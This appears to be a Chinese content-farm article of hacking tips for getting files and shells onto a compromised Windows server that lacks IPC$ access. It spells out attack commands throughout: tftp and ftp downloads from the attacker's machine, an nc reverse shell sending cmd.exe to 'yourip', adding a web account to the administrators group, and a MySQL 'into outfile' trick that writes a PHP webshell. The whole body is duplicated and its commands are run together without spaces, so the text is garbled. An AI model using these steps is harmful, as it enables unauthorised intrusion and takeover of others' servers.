豪士君测试所用平台

现在还有好多人不知道没开IPC$主机上传下载思路，接下来我们小编就来分享一下。

比如用溢出攻击得到权限发现没有开139or445我们可以从内部makeit崩溃：1.netshareipc$例如，使用webdav溢出得到systemnetshare看一下没有任何东西用什么东西都连不上所以要先打开ipc$——netshareipc$剩下的你愿意使用什么就可以了，比如dameware.2.tftp.exe获得sa空口令，使用sqlexec链接，只开了80和1433怎么办？别忘了，你是在内部控制他，防火墙是可以从内部突破的。打开本地的tftpserver然后在sqlexec中输入tftp-iyouripgetfiles就可以了。3.ftp脚本+nc比如从80端口溢出后可以，写一个ftp的脚本然后用ftp-sftp.txt从你的ftp下载nc。在溢出的命令提示符下使用ncnc-ec:\winnt\system32\cmd.exeyourip888在本地命令提示符下nc-l-p888-vv4.iusr_xx高权限的cmd.asp有运气的成分，80端口溢出，netlocalgroupadministratorsiusr_computername/add用echo写一个cmd.asp……5.使用mysql写的cmd.php我转再过一篇文章再贴一次通过mysql入侵1、在默认的mysql数据库中生成一个叫tmp的表，只有一个字段名，叫cmd，数据类型为text（可以不分大小写）usemysqlcreatetabletmp(cmdtext)2、在tmp表cmd字段中写入一段php代码（注意这个文件导出后一定要叫cmd2.php）insertintotmpvalues(<?if(isset($cmd)){$cmd=stripslashes($cmd);exec(\"$cmd>temp.dat\");}?>

写入到你刚才看见的web实际目录中（要注意的问题是直接写到你刚才看到的路径中可并不能直接访问到cmd2.php，你可以从里往外多试试）select*formtmpintooutfiled:\\path\\cmd2.php;删除tmp表droptabletmp;3、访问cmd2.php这是你将得到的webshell是system身份的！6.telnet用opentelnet的脚本7.同一防火墙内另一主机的辅助入侵有时候一些主机使用的是硬防火墙，很多主机躲在一个防火墙下面，它们之间是彼此无保护的，如果你成功的入侵了一台内网主机，你就可以实现向其他主机进军。8.一些发送到80端口的脚本正在搜集……9.正在想……目前就这么多想法大家补充吧比如用溢出攻击得到权限发现没有开139or445我们可以从内部makeit崩溃：1.netshareipc$例如，使用webdav溢出得到systemnetshare看一下没有任何东西用什么东西都连不上所以要先打开ipc$——netshareipc$剩下的你愿意使用什么就可以了，比如dameware.2.tftp.exe获得sa空口令，使用sqlexec链接，只开了80和1433怎么办？别忘了，你是在内部控制他，防火墙是可以从内部突破的。打开本地的tftpserver然后在sqlexec中输入tftp-iyouripgetfiles就可以了。3.ftp脚本+nc比如从80端口溢出后可以，写一个ftp的脚本然后用ftp-sftp.txt从你的ftp下载nc。在溢出的命令提示符下使用ncnc-ec:\winnt\system32\cmd.exeyourip888在本地命令提示符下nc-l-p888-vv4.iusr_xx高权限的cmd.asp有运气的成分，80端口溢出，netlocalgroupadministratorsiusr_computername/add用echo写一个cmd.asp……5.使用mysql写的cmd.php我转再过一篇文章再贴一次通过mysql入侵1、在默认的mysql数据库中生成一个叫tmp的表，只有一个字段名，叫cmd，数据类型为text（可以不分大小写）usemysqlcreatetabletmp(cmdtext)2、在tmp表cmd字段中写入一段php代码（注意这个文件导出后一定要叫cmd2.php）insertintotmpvalues(<?if(isset($cmd)){$cmd=stripslashes($cmd);exec(\"$cmd>temp.dat\");}?>

写入到你刚才看见的web实际目录中（要注意的问题是直接写到你刚才看到的路径中可并不能直接访问到cmd2.php，你可以从里往外多试试）select*formtmpintooutfiled:\\path\\cmd2.php;删除tmp表droptabletmp;3、访问cmd2.php这是你将得到的webshell是system身份的！6.telnet用opentelnet的脚本7.同一防火墙内另一主机的辅助入侵有时候一些主机使用的是硬防火墙，很多主机躲在一个防火墙下面，它们之间是彼此无保护的，如果你成功的入侵了一台内网主机，你就可以实现向其他主机进军。8.一些发送到80端口的脚本正在搜集……9.正在想……目前就这么多想法大家补充吧

没开IPC$主机上传下载思路文章到此结束，字数约3067字，希望可以帮助到大家。豪仕知识网往后会继续推荐没开IPC$主机上传下载思路相关内容。